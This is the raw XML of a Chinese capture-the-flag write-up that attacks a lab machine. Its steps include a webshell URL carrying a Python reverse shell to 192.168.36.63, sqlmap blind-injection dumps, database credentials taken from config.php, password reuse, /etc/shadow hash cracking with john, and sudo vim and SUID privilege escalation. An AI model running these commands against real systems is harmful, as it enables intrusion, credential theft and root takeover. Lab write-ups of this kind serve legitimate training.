      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中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_Ref24968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方法4-SQL语句写入WebShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接进行反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF33867" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.36.204:9006/upload/1.php?1=$(which python||which python3) -c 'import pty,os,socket as S;s=S.socket(S.AF_INET,S.SOCK_STREAM);s.connect(("192.168.36.63",443));O=os.dup2;n=s.fileno();O(n,0);O(n,1);O(n,2);pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C7AEF7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="7C903AFA" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>find / -iname '*flag*' 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443395C3" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /var/www/flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0526F2" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="02B3C1DF" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag{8337ef833b7644341f594e612dd588eb}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45214514" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5579D37C" wp14:editId="3DB32E17">
            <wp:extent cx="5271770" cy="3717290"/>
            <wp:effectExtent l="0" t="0" r="508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63EB88" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1C4F9407" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE9F4B" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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1-SQLMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6461D669" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref24945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flag3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end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_Ref26421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方法2-SQLMAP时间盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在flag表，使用SQLMAP可盲注出该flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B7601" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap -r r.txt -p username --dbms=mysql --technique=T -D admin -T flag --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AC181" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FE5418" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BECFBA8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1D7F14D4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1DFBED5E" wp14:editId="64CDEDC9">
            <wp:extent cx="4800600" cy="4057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4ED6B8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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2-ReverseShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中登录数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90122D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从config.php中获取连接数据库使用的用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78165788" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4B283287" wp14:editId="60273E35">
            <wp:extent cx="5274310" cy="16529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29011C" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin / KPHZL4KFT2QME4ZXX3KNZLWJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C36A9" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0169C0AC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql -u admin -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511140B4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KPHZL4KFT2QME4ZXX3KNZLWJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEC1867" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0570F2A6" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59198BDE" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use admin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44179B04" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2BA59" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select * from flag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D3D6A0" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADDA059" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5C8A56F0" wp14:editId="42360D4E">
            <wp:extent cx="5269230" cy="6386830"/>
            <wp:effectExtent l="0" t="0" r="762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8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5D69A7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31AACDB0" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag{fdd688559882bf3bca6aad6a8db4a29d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A19E40" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="5340B166" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E28014" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集靶机系统用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53586564" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /etc/passwd|grep -v ssh|grep sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01369D5A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273F2804" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEDC46" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user:x:1000:1000::/home/user:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32853EF6" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明本机存在两个用户 root 与 user 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD3723" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="27C91667" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复用密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D3B57" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试使用之前收集的密码信息进行登录，发现数据库密码即 user 用户的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A7536" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="77BF7513" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user / KPHZL4KFT2QME4ZXX3KNZLWJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB5FA7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="749145FB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2EA93431" wp14:editId="2C4400E3">
            <wp:extent cx="4162425" cy="800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36B6DB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="4211AF06" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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2-sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B744D40" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查 sudo 配置情况，发现sudo命令可切换至user用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C46271" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo -u user bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44019338" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="47E2CA13" wp14:editId="626F0AED">
            <wp:extent cx="5269865" cy="1825625"/>
            <wp:effectExtent l="0" t="0" r="698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79A317" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5472515E" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="40A85CD6" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /home/user/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE67D8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag{f49a058245fffd6e688df7f39d33abce}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE284BC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="1C0B1423" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="70105582" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag{f49a058245fffd6e688df7f39d33abce}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD516A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="3D192CA5" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D28751" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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1-HASH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9DEBF1" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察到 user 用户属于 shadow 用户组，该组成员可以读取 /etc/shadow 文件，将其中的 root 密码 hash 进行破解可得到 root 密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01715B44" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="74C6E397" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5902FFA3" wp14:editId="6315EC60">
            <wp:extent cx="5267960" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="889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16184A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：由于靶机环境配置问题，root hash未正常写入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE7446" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照预想情况，靶机root hash为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF6D67" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$1$A5aJmH.V$Q3UfFj.GMCfN19qdotwLc/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43050FAA" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5B1A08BF" wp14:editId="10CE7A7B">
            <wp:extent cx="3019425" cy="2476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36C15A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该hash可通过john / hashcat / cmd5等获得密码明文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4764F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5C3D7428" wp14:editId="3C9E1A91">
            <wp:extent cx="5270500" cy="1665605"/>
            <wp:effectExtent l="9525" t="9525" r="15875" b="203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5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B7BA8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="186E0611" wp14:editId="4FEB8866">
            <wp:extent cx="5273040" cy="1890395"/>
            <wp:effectExtent l="0" t="0" r="3810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A3B666" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="72991CC7" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>john --wordlist=~/rockyou.txt --format=crypt --user=root shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1E132" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38593260" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root / 1234567890@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE666A" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="64DBCCAB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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2-sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F47A5FE" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在 user 用户下使用 sudo -l 检查权限（基于复用密码），发现可执行vim程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7F45D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="19DCA32C" wp14:editId="406C9AF6">
            <wp:extent cx="5267960" cy="2338705"/>
            <wp:effectExtent l="0" t="0" r="889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266D9F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="034864CD" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2181B040" wp14:editId="07535BC6">
            <wp:extent cx="5272405" cy="1491615"/>
            <wp:effectExtent l="0" t="0" r="4445" b="133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4FBF81" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="0D725FBB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF4550" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A30E73" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KPHZL4KFT2QME4ZXX3KNZLWJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E4817" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D06CEE" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:!bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFA062" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E892BD" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="62522CE8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="23F46A36" wp14:editId="729B64B1">
            <wp:extent cx="3581400" cy="8477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91AEBB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="40E8E55F" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000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3-SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B43225" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找系统中启用了SUID的程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F49DF8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>find / -type f -perm -u=s 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CF57C" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="584246F9" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4E72DAA7" wp14:editId="273B185A">
            <wp:extent cx="4200525" cy="21431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A9AFC1" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="65C824CD" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
